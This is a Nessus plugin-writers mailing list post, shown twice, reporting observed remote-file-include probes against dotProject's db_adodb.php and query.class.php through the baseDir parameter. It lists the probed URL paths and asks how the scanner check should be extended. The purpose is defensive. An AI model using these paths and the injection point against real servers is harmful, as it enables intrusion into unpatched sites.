dotproject_file_includes.nasl
We have seen probes to a web server trying to exploit the remote file
include vulnerability in db_adodb.php. The URLs that are being tried are:
/db_adodb.php
/dotproject/includes/db_adodb.php
/includes/db_adodb.php
/project/includes/db_adodb.php
/projects/includes/db_adodb.php
I don't know if these are all valid location for db_adodb.php. But, it looks
like dotproject_file_includes.nasl doesn't try the first of these URLs.
These probes also try an identical remote file include (using baseDir)
against another php routine - query.class.php. The specific URLs tried are:
/classes/query.class.php
/dotproject/classes/query.class.php
/proj/classes/query.class.php
/project/classes/query.class.php
There isn't a plugin that checks for query.class.php. This vulnerability is
documented as Bugtraq ID: 19547. Should the check for this php routine be
added to dotproject_file_includes.nasl or should it be a separate plugin?
_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers
We have seen probes to a web server trying to exploit the remote file
include vulnerability in db_adodb.php. The URLs that are being tried are:
/db_adodb.php
/dotproject/includes/db_adodb.php
/includes/db_adodb.php
/project/includes/db_adodb.php
/projects/includes/db_adodb.php
I don't know if these are all valid location for db_adodb.php. But, it looks
like dotproject_file_includes.nasl doesn't try the first of these URLs.
These probes also try an identical remote file include (using baseDir)
against another php routine - query.class.php. The specific URLs tried are:
/classes/query.class.php
/dotproject/classes/query.class.php
/proj/classes/query.class.php
/project/classes/query.class.php
There isn't a plugin that checks for query.class.php. This vulnerability is
documented as Bugtraq ID: 19547. Should the check for this php routine be
added to dotproject_file_includes.nasl or should it be a separate plugin?
_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers